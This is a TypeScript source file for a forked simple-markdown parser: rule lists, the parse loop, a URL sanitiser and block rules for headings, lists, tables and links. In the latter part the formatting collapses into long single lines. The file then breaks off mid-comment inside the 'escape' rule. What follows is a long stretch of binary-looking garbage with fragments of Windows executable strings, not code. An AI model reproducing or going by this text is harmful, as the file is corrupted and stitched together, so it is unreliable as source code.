// @ts-nocheck
// # Simple-Markdown Core
//
// This is a fork of Khan-academy's Simple-Markdown[1], initially forked in 2022
// to add Svelte support[2], and used for paper clover's q+a markdown flavor.
//
// 1: https://github.com/Khan/perseus/tree/main/packages/simple-markdown/src
// 2: https://github.com/paperclover/svelte-simple-markdown

/** Rules keyed by their `name`, as produced by `RuleList.toRuleObject()`. */
export type Rules = Record<string, ParserRule>;

/** A single grammar rule: how to recognise a construct and how to parse it. */
export interface ParserRule {
  /** Unique rule name; also used as the default `type` of the parsed node. */
  name: string;
  /** Returns a capture anchored at index 0 of the source, or a nullish value. */
  match: MatchFunction;
  /** Turns a capture into an AST node (the `type` may be omitted). */
  parse: ParseFunction;
  /** Optional tie-breaker: among consecutive matching rules, higher wins. */
  quality?: QualityFunction;
}

/**
 * An ordered list of parser rules. The position in the list is the rule's
 * precedence: earlier rules are tried first by `createParser`.
 */
export class RuleList extends Array<ParserRule> {
  /**
   * @param input optional rules to copy into the new list.
   *
   * Built-in array methods (e.g. `splice`) construct their result through
   * this constructor with a numeric length; `Array.from(<number>)` is an
   * empty array, so that path adds nothing.
   */
  constructor(input?: ArrayLike<ParserRule>) {
    super();
    if (input) {
      this.push(...Array.from(input));
    }
  }

  /**
   * Returns the index of the rule called `rule`.
   * @throws Error when no rule has that name.
   */
  private indexOfOrThrow(rule: string): number {
    const index = this.findIndex((r) => r.name === rule);
    if (index === -1) {
      throw new Error(`Rule ${rule} not found`);
    }
    return index;
  }

  /**
   * Inserts `newRule` directly before the rule named `rule`.
   * @throws Error when `rule` is not in the list.
   */
  insertBefore(rule: string, newRule: ParserRule): void {
    this.splice(this.indexOfOrThrow(rule), 0, newRule);
  }

  /**
   * Inserts `newRule` directly after the rule named `rule`.
   * @throws Error when `rule` is not in the list.
   */
  insertAfter(rule: string, newRule: ParserRule): void {
    this.splice(this.indexOfOrThrow(rule) + 1, 0, newRule);
  }

  /**
   * Builds a `name -> rule` object. When two rules share a name the later
   * one overwrites the earlier one.
   */
  toRuleObject(): Record<string, ParserRule> {
    const result: Record<string, ParserRule> = {};
    for (const rule of this) {
      result[rule.name] = rule;
    }
    return result;
  }

  /** Appends `rule` to the end of the list (lowest precedence). */
  add(rule: ParserRule): void {
    this.push(rule);
  }

  /** Returns the rule named `rule`, or `undefined` when there is none. */
  get(rule: string): ParserRule | undefined {
    return this.find((r) => r.name === rule);
  }

  /**
   * Removes the rule named `rule`.
   * @throws Error when `rule` is not in the list.
   */
  remove(rule: string): void {
    this.splice(this.indexOfOrThrow(rule), 1);
  }

  /** Returns a shallow copy of this list (the rule objects are shared). */
  clone() {
    return new RuleList(this);
  }
}

/**
 * Creates a parser for a given list of rules. Rules are tried in the key
 * order of `ruleListInput.toRuleObject()`.
 *
 * @param ruleListInput
 *     the rules to parse with; each provides `match`, `parse` and
 *     optionally `quality`
 * @param [defaultState]
 *     properties copied onto the state object at the start of every
 *     top-level parse (they overwrite same-named properties of the state
 *     passed by the caller)
 *
 * @returns
 *     The resulting parse function, with the following parameters:
 *     @source: the input source string to be parsed
 *     @state: an optional object to be threaded through parse
 *         calls. Allows clients to add stateful operations to
 *         parsing, such as keeping track of how many levels deep
 *         some nesting is. For an example use-case, see passage-ref
 *         parsing in src/widgets/passage/passage-markdown.jsx
 *
 * @throws Error when no rule matches the remaining source, or when a rule's
 *     `match` returns a capture that does not start at index 0.
 */
export function createParser(
  ruleListInput: RuleList,
  defaultState: Partial<ParserState> = {},
) {
  const rules = ruleListInput.toRuleObject();
  const ruleList = Object.keys(rules);
  // The state of the most recent parse call; nested calls that omit `state`
  // fall back to it.
  let latestState: ParserState;

  const nestedParse = function (source: string, state?: ParserState) {
    const result: ASTNode[] = [];
    state = state || latestState;
    latestState = state;
    while (source) {
      // store the best match, its rule, and quality:
      let ruleType: string | null = null;
      let rule: ParserRule | null = null;
      let capture: RegExpMatchArray | null = null;
      let quality = NaN;

      // loop control variables:
      let i = 0;
      let currRuleType = ruleList[0];
      let currRule = rules[currRuleType];

      do {
        const currCapture = currRule.match(source, state);

        if (currCapture) {
          const currQuality = currRule.quality
            ? currRule.quality(currCapture, state)
            : 0;
          // This should always be true the first time because
          // the initial quality is NaN (that's why there's the
          // condition negation).
          if (!(currQuality <= quality)) {
            ruleType = currRuleType;
            rule = currRule;
            capture = currCapture;
            quality = currQuality;
          }
        }

        // Move on to the next item.
        // Note that this makes `currRule` be the next item
        i++;
        currRuleType = ruleList[i];
        currRule = rules[currRuleType];
      } while (
        // keep looping while we're still within the ruleList
        currRule &&
        // if we don't have a match yet, continue
        (!capture ||
          // or if we have a match, but the next rule has a quality
          // measurement function, we need to check whether it is
          // a better quality match
          currRule.quality)
      );

      if (!rule || !capture || !ruleType) {
        throw new Error(
          "Could not find a matching rule for the below " +
            "content. The rule with highest `order` should " +
            "always match content provided to it. Check " +
            "the definition of `match` for '" +
            ruleList[ruleList.length - 1] +
            "'. It seems to not match the following source:\n" +
            source,
        );
      }
      if (capture.index) {
        // If present and non-zero, i.e. a non-^ regexp result:
        throw new Error(
          "`match` must return a capture starting at index 0 " +
            "(the current parse index). Did you forget a ^ at the " +
            "start of the RegExp?",
        );
      }

      const parsed = rule.parse(capture, nestedParse, state);
      // We maintain the same object here so that rules can
      // store references to the objects they return and
      // modify them later. (oops sorry! but this adds a lot
      // of power--see reflinks.)

      // We also let rules override the default type of
      // their parsed node if they would like to, so that
      // there can be a single output function for all links,
      // even if there are several rules to parse them.
      if (!parsed.type) {
        parsed.type = ruleType;
      }

      // Collapse adjacent text nodes into one
      if (
        parsed.type === "text" &&
        result[result.length - 1]?.type === "text"
      ) {
        result[result.length - 1].content += parsed.content;
      } else {
        result.push(parsed as ASTNode);
      }

      state.prevCapture = capture;
      source = source.substring(state.prevCapture[0].length);
    }

    return result;
  };

  const outerParse = function (
    source: string,
    state: ParserState = { inline: false },
  ) {
    latestState = populateInitialState(state, defaultState);
    if (!latestState.inline && !latestState.disableAutoBlockNewlines) {
      source = source + "\n\n";
    }
    // We store the previous capture so that match functions can
    // use some limited amount of lookbehind. Lists use this to
    // ensure they don't match arbitrary '- ' or '* ' in inline
    // text (see the list rule for more information). This stores
    // the full regex capture object, if there is one.
    latestState.prevCapture = undefined;
    return nestedParse(preprocess(source), latestState);
  };

  return outerParse;
}

type Multiple<T> = T | T[];
type Nullable<T> = T | null | undefined;

/** Tries to match a rule at the start of `source`. */
export type MatchFunction = (
  source: string,
  state: ParserState,
) => Nullable<RegExpMatchArray>;

/** Parses `source` into AST nodes; `state` defaults to the latest state. */
export type Parser = (source: string, state?: ParserState) => ASTNode[];

/** Converts a rule's capture into an AST node. */
export type ParseFunction = (
  source: RegExpMatchArray,
  nestedParse: Parser,
  state: ParserState,
) => TypeOptionalASTNode;

/** Scores a capture; used to choose between consecutive matching rules. */
export type QualityFunction = (
  capture: RegExpMatchArray,
  state: ParserState,
) => number;

/** Mutable state threaded through every match/parse call. */
export interface ParserState {
  /** True while parsing inline content, false for block content. */
  inline: boolean;
  /** Capture consumed by the previous rule, for limited lookbehind. */
  prevCapture?: RegExpMatchArray;
  [key: string]: any;
}

export interface ASTNode {
  type: string;
  content?: ASTNode[] | string;
  [key: string]: any;
}

/** An AST node whose `type` may still be filled in by the parser. */
export type TypeOptionalASTNode = Omit<ASTNode, "type"> & { type?: string };

export interface RefNode {
  type: string;
  // NOTE(review): the type argument was missing in the source; `ASTNode` is
  // presumed here -- confirm against the original file.
  content?: Multiple<ASTNode>;
  target?: string;
  title?: string;
  alt?: string;
}

/** Creates a match function for an inline scoped element from a regex */
export function inlineRegex(regex: RegExp): MatchFunction {
  return (source, state) => (state.inline ? regex.exec(source) : null);
}

/** Creates a match function for a block scoped element from a regex */
export function blockRegex(regex: RegExp): MatchFunction {
  return (source, state) => (state.inline ? null : regex.exec(source));
}

/** Creates a match function from a regex, ignoring block/inline scope */
export function anyScopeRegex(regex: RegExp): MatchFunction {
  return (source) => regex.exec(source);
}

const UNESCAPE_URL_R = /\\([^0-9A-Za-z\s])/g;

/** Removes the backslash from every backslash-escaped punctuation character. */
export function unescapeUrl(rawUrlString: string) {
  return rawUrlString.replace(UNESCAPE_URL_R, "$1");
}

/**
 * Parse some content with the parser `parse`, with state.inline
 * set to true. Useful for block elements; not generally necessary
 * to be used by inline elements (where state.inline is already true).
 *
 * The previous value of `state.inline` is restored afterwards, even when
 * `parse` throws.
 */
export function parseInline(
  parse: Parser,
  content: string,
  state: ParserState,
) {
  const isCurrentlyInline = state.inline || false;
  state.inline = true;
  try {
    return parse(content, state);
  } finally {
    state.inline = isCurrentlyInline;
  }
}

/**
 * Parse some content with the parser `parse`, with state.inline set to
 * false. Two newlines are appended to `content` before parsing.
 *
 * The previous value of `state.inline` is restored afterwards, even when
 * `parse` throws.
 */
export function parseBlock(parse: Parser, content: string, state: ParserState) {
  const isCurrentlyInline = state.inline || false;
  state.inline = false;
  try {
    return parse(content + "\n\n", state);
  } finally {
    state.inline = isCurrentlyInline;
  }
}

/** Parse function that inline-parses the first capture group as `content`. */
export function parseCaptureInline(
  capture: RegExpMatchArray,
  parse: Parser,
  state: ParserState,
) {
  return {
    content: parseInline(parse, capture[1], state),
  };
}

/** Parse function for rules that carry no data: returns an empty node. */
export function ignoreCapture() {
  return {};
}

// Protocols that sanitizeUrl refuses to pass through.
const UNSAFE_URL_PROTOCOLS = ["javascript:", "vbscript:", "data:"];

/**
 * Returns `url` unchanged when it is safe to use as a link target, and
 * `null` when it is nullish, cannot be parsed, or resolves to a
 * `javascript:`, `vbscript:` or `data:` URL.
 */
export function sanitizeUrl(url?: string) {
  if (url == null) {
    return null;
  }
  try {
    // The base URL lets relative URLs parse; absolute URLs ignore it.
    const prot = new URL(url, "https://localhost").protocol;
    if (UNSAFE_URL_PROTOCOLS.some((unsafe) => prot.startsWith(unsafe))) {
      return null;
    }
  } catch {
    // invalid URLs should throw a TypeError
    // see for instance: `new URL("");`
    return null;
  }
  return url;
}

const CR_NEWLINE_R = /\r\n?/g;
const TAB_R = /\t/g;
const FORMFEED_R = /\f/g;

/**
 * Turn various whitespace into easy-to-process whitespace
 */
function preprocess(source: string) {
  // NOTE(review): upstream simple-markdown expands a tab to four spaces; the
  // single space here may be an artifact of whitespace collapsing -- confirm.
  return source
    .replace(CR_NEWLINE_R, "\n")
    .replace(FORMFEED_R, "")
    .replace(TAB_R, " ");
}

/**
 * Copies every own property of `defaultState` onto `givenState` (or onto a
 * fresh object when `givenState` is nullish) and returns that object.
 * `givenState` is mutated in place, and defaults overwrite same-named
 * properties already present on it.
 */
function populateInitialState(
  givenState: Partial<ParserState>,
  defaultState: Partial<ParserState>,
) {
  const state = givenState || {};
  for (const prop in defaultState) {
    if (Object.prototype.hasOwnProperty.call(defaultState, prop)) {
      state[prop] = defaultState[prop];
    }
  }
  return state as ParserState;
}

// recognize a `*` `-`, `+`, `1.`, `2.`...
list bullet const LIST_BULLET = "(?:[*+-]|\\d+\\.)"; // recognize the start of a list item: // leading space plus a bullet plus a space (` * `) const LIST_ITEM_PREFIX = "( *)(" + LIST_BULLET + ") +"; const LIST_ITEM_PREFIX_R = new RegExp("^" + LIST_ITEM_PREFIX); // recognize an individual list item: // * hi // this is part of the same item // // as is this, which is a new paragraph in the same item // // * but this is not part of the same item const LIST_ITEM_R = new RegExp( LIST_ITEM_PREFIX + "[^\\n]*(?:\\n" + "(?!\\1" + LIST_BULLET + " )[^\\n]*)*(\n|$)", "gm", ); const BLOCK_END_R = /\n{2,}$/; const INLINE_CODE_ESCAPE_BACKTICKS_R = /^ (?= *`)|(` *) $/g; // recognize the end of a paragraph block inside a list item: // two or more newlines at end end of the item const LIST_BLOCK_END_R = BLOCK_END_R; const LIST_ITEM_END_R = / *\n+$/; // check whether a list item has paragraphs: if it does, // we leave the newlines at the end const LIST_R = new RegExp( "^( *)(" + LIST_BULLET + ") " + "[\\s\\S]+?(?:\n{2,}(?! 
)" + "(?!\\1" + LIST_BULLET + " )\\n*" + // the \\s*$ here is so that we can parse the inside of nested // lists, where our content might end before we receive two `\n`s "|\\s*\n*$)", ); const LIST_LOOKBEHIND_R = /(?:^|\n)( *)$/; const TABLES = (function () { const TABLE_ROW_SEPARATOR_TRIM = /^ *\| *| *\| *$/g; const TABLE_CELL_END_TRIM = / *$/; const TABLE_RIGHT_ALIGN = /^ *-+: *$/; const TABLE_CENTER_ALIGN = /^ *:-+: *$/; const TABLE_LEFT_ALIGN = /^ *:-+ *$/; // TODO: This needs a real type const parseTableAlignCapture = (alignCapture: string) => { if (TABLE_RIGHT_ALIGN.test(alignCapture)) { return "right"; } else if (TABLE_CENTER_ALIGN.test(alignCapture)) { return "center"; } else if (TABLE_LEFT_ALIGN.test(alignCapture)) { return "left"; } else { return null; } }; const parseTableAlign = (source: string, trimEndSeparators: boolean) => { if (trimEndSeparators) { source = source.replace(TABLE_ROW_SEPARATOR_TRIM, ""); } const alignText = source.trim().split("|"); return alignText.map(parseTableAlignCapture); }; const parseTableRow = ( source: string, parse: Parser, state: ParserState, trimEndSeparators: boolean, ) => { const prevInTable = state.inTable; state.inTable = true; const tableRow = parse(source.trim(), state); state.inTable = prevInTable; const cells: ASTNode[][] = [[]]; tableRow.forEach(function (node, i) { if (node.type === "tableSeparator") { // Filter out empty table separators at the start/end: if (!trimEndSeparators || (i !== 0 && i !== tableRow.length - 1)) { // Split the current row: cells.push([]); } } else { if ( typeof node.content === "string" && (tableRow[i + 1] == null || tableRow[i + 1].type === "tableSeparator") ) { node.content = node.content.replace(TABLE_CELL_END_TRIM, ""); } cells[cells.length - 1].push(node); } }); return cells; }; /** * @param {string} source * @param {SimpleMarkdown.Parser} parse * @param {SimpleMarkdown.State} state * @param {boolean} trimEndSeparators * @returns {SimpleMarkdown.ASTNode[][]} */ const 
parseTableCells = function ( source: string, parse: Parser, state: ParserState, trimEndSeparators: boolean, ) { const rowsText = source.trim().split("\n"); return rowsText.map(function (rowText) { return parseTableRow(rowText, parse, state, trimEndSeparators); }); }; /** * @param {boolean} trimEndSeparators * @returns {SimpleMarkdown.SingleNodeParseFunction} */ const parseTable = function (trimEndSeparators: boolean) { return function ( capture: RegExpMatchArray, parse: Parser, state: ParserState, ) { state.inline = true; const header = parseTableRow(capture[1], parse, state, trimEndSeparators); const align = parseTableAlign(capture[2], trimEndSeparators); const cells = parseTableCells( capture[3], parse, state, trimEndSeparators, ); state.inline = false; return { type: "table", header: header, align: align, cells: cells, }; }; }; return { parseTable: parseTable(true), parseNpTable: parseTable(false), TABLE_REGEX: /^ *(\|.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/, NPTABLE_REGEX: /^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/, }; })(); const LINK_INSIDE = "(?:\\[[^\\]]*\\]|[^\\[\\]]|\\](?=[^\\[]*\\]))*"; const LINK_HREF_AND_TITLE = "\\s*?(?:\\s+['\"]([\\s\\S]*?)['\"])?\\s*"; const AUTOLINK_MAILTO_CHECK_R = /mailto:/i; function parseRef( capture: RegExpMatchArray, state: ParserState, refNode: RefNode, ) { const ref = (capture[2] || capture[1]).replace(/\s+/g, " ").toLowerCase(); // We store information about previously seen defs on // state._defs (_ to deconflict with client-defined // state). If the def for this reflink/refimage has // already been seen, we can use its target/source // and title here: if (state._defs && state._defs[ref]) { const def = state._defs[ref]; // `refNode` can be a link or an image. Both use // target and title properties. 
refNode.target = def.target; refNode.title = def.title; } // In case we haven't seen our def yet (or if someone // overwrites that def later on), we add this node // to the list of ref nodes for that def. Then, when // we find the def, we can modify this link/image AST // node :). // I'm sorry. state._refs = state._refs || {}; state._refs[ref] = state._refs[ref] || []; state._refs[ref].push(refNode); return refNode; } export const defaultRules = new RuleList(); { defaultRules.add({ name: "heading", match: blockRegex(/^ *(#{1,6})([^\n]+?)#* *(?:\n *)+\n/), parse: function (capture, parse, state) { return { level: capture[1].length, content: parseInline(parse, capture[2].trim(), state), }; }, }); defaultRules.add({ name: "nptable", match: blockRegex(TABLES.NPTABLE_REGEX), parse: TABLES.parseNpTable, }); defaultRules.add({ name: "lheading", match: blockRegex(/^([^\n]+)\n *(=|-){3,} *(?:\n *)+\n/), parse(capture, parse, state) { return { type: "heading", level: capture[2] === "=" ? 1 : 2, content: parseInline(parse, capture[1], state), }; }, }); defaultRules.add({ name: "hr", match: blockRegex(/^( *[-*_]){3,} *(?:\n *)+\n/), parse: ignoreCapture, }); defaultRules.add({ name: "codeBlock", match: blockRegex(/^(?: {4}[^\n]+\n*)+(?:\n *)+\n/), parse(capture) { const content = capture[0].replace(/^ {4}/gm, "").replace(/\n+$/, ""); return { lang: undefined, content: content, }; }, }); defaultRules.add({ name: "fence", match: blockRegex( /^ *(`{3,}|~{3,}) *(?:(\S+) *)?\n([\s\S]+?)\n?\1 *(?:\n *)+\n/, ), parse(capture) { return { type: "codeBlock", lang: capture[2] || undefined, content: capture[3], }; }, }); defaultRules.add({ name: "blockQuote", match: blockRegex(/^( *>[^\n]+(\n[^\n]+)*\n*)+\n{2,}/), parse(capture, parse, state) { const content = capture[0].replace(/^ *> ?/gm, ""); return { content: parse(content, state), }; }, }); defaultRules.add({ name: "list", match(source, state) { // We only want to break into a list if we are at the start of a // line. 
This is to avoid parsing "hi * there" with "* there" // becoming a part of a list. // You might wonder, "but that's inline, so of course it wouldn't // start a list?". You would be correct! Except that some of our // lists can be inline, because they might be inside another list, // in which case we can parse with inline scope, but need to allow // nested lists inside this inline scope. const prevCaptureStr = state.prevCapture == null ? "" : state.prevCapture[0]; const isStartOfLineCapture = LIST_LOOKBEHIND_R.exec(prevCaptureStr); const isListBlock = state._list || !state.inline; if (isStartOfLineCapture && isListBlock) { source = isStartOfLineCapture[1] + source; return LIST_R.exec(source); } else { return null; } }, parse(capture, parse, state) { const bullet = capture[2]; const ordered = bullet.length > 1; const start = ordered ? +bullet : undefined; // We know this will match here, because of how the regexes are defined // eslint-disable-next-line @typescript-eslint/no-non-null-assertion const items = capture[0].replace(LIST_BLOCK_END_R, "\n").match( LIST_ITEM_R, )!; let lastItemWasAParagraph = false; const itemContent = items.map(function (item, i) { // We need to see how far indented this item is: const prefixCapture = LIST_ITEM_PREFIX_R.exec(item); const space = prefixCapture ? prefixCapture[0].length : 0; // And then we construct a regex to "unindent" the subsequent // lines of the items by that amount: const spaceRegex = new RegExp("^ {1," + space + "}", "gm"); // Before processing the item, we need a couple things const content = item // remove indents on trailing lines: .replace(spaceRegex, "") // remove the bullet: .replace(LIST_ITEM_PREFIX_R, ""); // I'm not sur4 why this is necessary again? 
// Handling "loose" lists, like: // // * this is wrapped in a paragraph // // * as is this // // * as is this const isLastItem = i === items.length - 1; const containsBlocks = content.indexOf("\n\n") !== -1; // Any element in a list is a block if it contains multiple // newlines. The last element in the list can also be a block // if the previous item in the list was a block (this is // because non-last items in the list can end with \n\n, but // the last item can't, so we just "inherit" this property // from our previous element). const thisItemIsAParagraph = containsBlocks || (isLastItem && lastItemWasAParagraph); lastItemWasAParagraph = thisItemIsAParagraph; // backup our state for restoration afterwards. We're going to // want to set state._list to true, and state.inline depending // on our list's looseness. const oldStateInline = state.inline; const oldStateList = state._list; state._list = true; // Parse inline if we're in a tight list, or block if we're in // a loose list. let adjustedContent; if (thisItemIsAParagraph) { state.inline = false; adjustedContent = content.replace(LIST_ITEM_END_R, "\n\n"); } else { state.inline = true; adjustedContent = content.replace(LIST_ITEM_END_R, ""); } const result = parse(adjustedContent, state); // Restore our state before returning state.inline = oldStateInline; state._list = oldStateList; return result; }); return { ordered: ordered, start: start, content: itemContent, }; }, }); defaultRules.add({ name: "def", // TODO: This will match without a blank line before the next // block element, which is inconsistent with most of the rest of // simple-markdown. match: blockRegex( /^ *\[([^\]]+)\]: *]*)>?(?: +["(]([^\n]+)[")])? 
*\n(?: *\n)*/, ), parse(capture, parse, state) { const def = capture[1].replace(/\s+/g, " ").toLowerCase(); const target = capture[2]; const title = capture[3]; // Look for previous links/images using this def // If any links/images using this def have already been declared, // they will have added themselves to the state._refs[def] list // (_ to deconflict with client-defined state). We look through // that list of reflinks for this def, and modify those AST nodes // with our newly found information now. // Sorry :(. if (state._refs && state._refs[def]) { // `refNode` can be a link or an image state._refs[def].forEach((refNode: RefNode) => { refNode.target = target; refNode.title = title; }); } // Add this def to our map of defs for any future links/images // In case we haven't found any or all of the refs referring to // this def yet, we add our def to the table of known defs, so // that future reflinks can modify themselves appropriately with // this information. state._defs = state._defs || {}; state._defs[def] = { target: target, title: title, }; // return the relevant parsed information // for debugging only. return { def: def, target: target, title: title, }; }, }); defaultRules.add({ name: "table", match: blockRegex(TABLES.TABLE_REGEX), parse: TABLES.parseTable, }); defaultRules.add({ name: "newline", match: blockRegex(/^(?:\n *)*\n/), parse: ignoreCapture, }); defaultRules.add({ name: "paragraph", match: blockRegex(/^((?:[^\n]|\n(?! 
*\n))+)(?:\n *)+\n/), parse: parseCaptureInline, }); defaultRules.add({ name: "escape", // We don't allow escaping numbers, letters, or spaces here so that @VXLL p8VxK<e@,vDl35 ?????????????????????????????dmain.cpropgtpthrwtUn0tfciwbyR "\DlMainKexIit0"aizPProp g0o `pAd3264TPhOeRwe'p{I*moptPabP NmP 1 PpacONq*fp cinCQ*bpckochpwSuPsysp)eVPr5 hoų`j(0t Proces ratPdpTh VxKx vprinBi1.12Ar428(TRl0aPe) UpgPam64-biP andtoprptngsy1 _Q1Ful 5 h2oR3EXE:CPl\ F s\GtWP ow\0 Zi g1 \2 ng.p x0ZCm le] 9 -UPoppPgrmsq u3p0rlp =1-ine=thQQ-zur%l%$ #ZScq%fyq1i0 Qz   q %.p!%Ifoat%eesvRuePf2ai0DPsbpeFCP(id0rA&p*c]Qcv$VruoPf S 1;/sso0S0P;0 1Ak"PS0r0nkR d fU14tlp ap#ep DL5>o&Q 0s"7<77}7;%~3pJ""iGXKf\0m.s@ o@Bp@As@Hi@sM˾i@oYKN7bd.j@wGaCpCn ovU0m&cRraeb|%"j`"``rZS c 0flU` y]i` iTiU[l z dD ]Lw`acZs`b`g. T :w f u a{ s a Um a hiA : b"?VxK x"64IsZm`nwe+e8-`slmfk ;yKu&r`c?rony^E GaCaR9f?\~ ~ \~~nJ~!*W]~\?1o! PHq4{11~o~~3~~1_?F ~r[pGqh&\cpoP?hUm0??2iJU22 ~q0&~uېrwnTS;d=?py&@pXR.|qXQ\5yprP:xADuAЫI.^т P>kwa0v}np߇+LЅ R!KEP NPLbPQ_Y(_P _)vP>x^&dp3ls)U0q1 zxr W2_tԋ@pmڱwk+rk; w! p4e)lp1  o/ q]\0e_xl"r1 UR зx00:7 20Qi00 (size:h117 52kņDW"UNlPbcnpv-MjkGtMsm@nwA)ntY,:;_6 ob0z9 :7`"b1-:+{:=teVq;b`|sD;(m vc1#I`.f?!h YtPi?~e ;m?E#CA-1`!E4 髧#k7r2h???'+''B;hml7`sly'jL_-l0%'{{uX'gy'Q[m0 Sgl @k@b@ZsWSyE(hm^ve~tH|-EAtY}NzDh^1DLIb•\ul@bw%G2 68 C-Gau6t7?u"u?G?G?G?G ?GrDOTj \ue c.ew"_;yGV`lKkxq?#Be^B @#D17`/;(knoUS`RR?(a?(G1%#07 1We%04n y!a9&}5mNGLI%pPF_o_oL]??325_H۰,qS4%8%9f%LK_]߁`߁%??;B01%5'37U$ /PX7d$P7s/1$C$$8$q+Iߧ7KWM9ߦ 0J^צ^^CPD߀30`80?&Qwj^8V^SIO0r9_^?1EPI1]941M2~Q͝&RPWRFLLL͟^9}_dR__:Cq1]^q2L^ym&T0MPA_IFu_ddp"A K Wr0929216 bytes)Uj(L@ lTh DL CFGMR3.dl wa mppjdFu>pjtM }o[ e+Y: "]:\WinWoSsss ms\" okd u 0x07bED4 (`izG2184 NOJEA^UU!ME@`2uM8@L0AVjΛo@e@tŰkJ7}EϘ1Q9@QKeVPKDEVOBJ?s/s1?&#rEk5&%6%9%TqKkn`Ct%PrPoga `iYaV K xa\/'U'Ce7vs5bi4 t-sM+DNS [PIMLs!ץ1%%D I!Js37`7`&/%%W%2_/s%%ls9EB%,30&ц%Lf߾9%%tP7QdPw~\0~y0??;EP1?%2P%68R%lpb sЖ-0_%/?LC8\?L7LGtޚmPjnPOw\ќ\Ois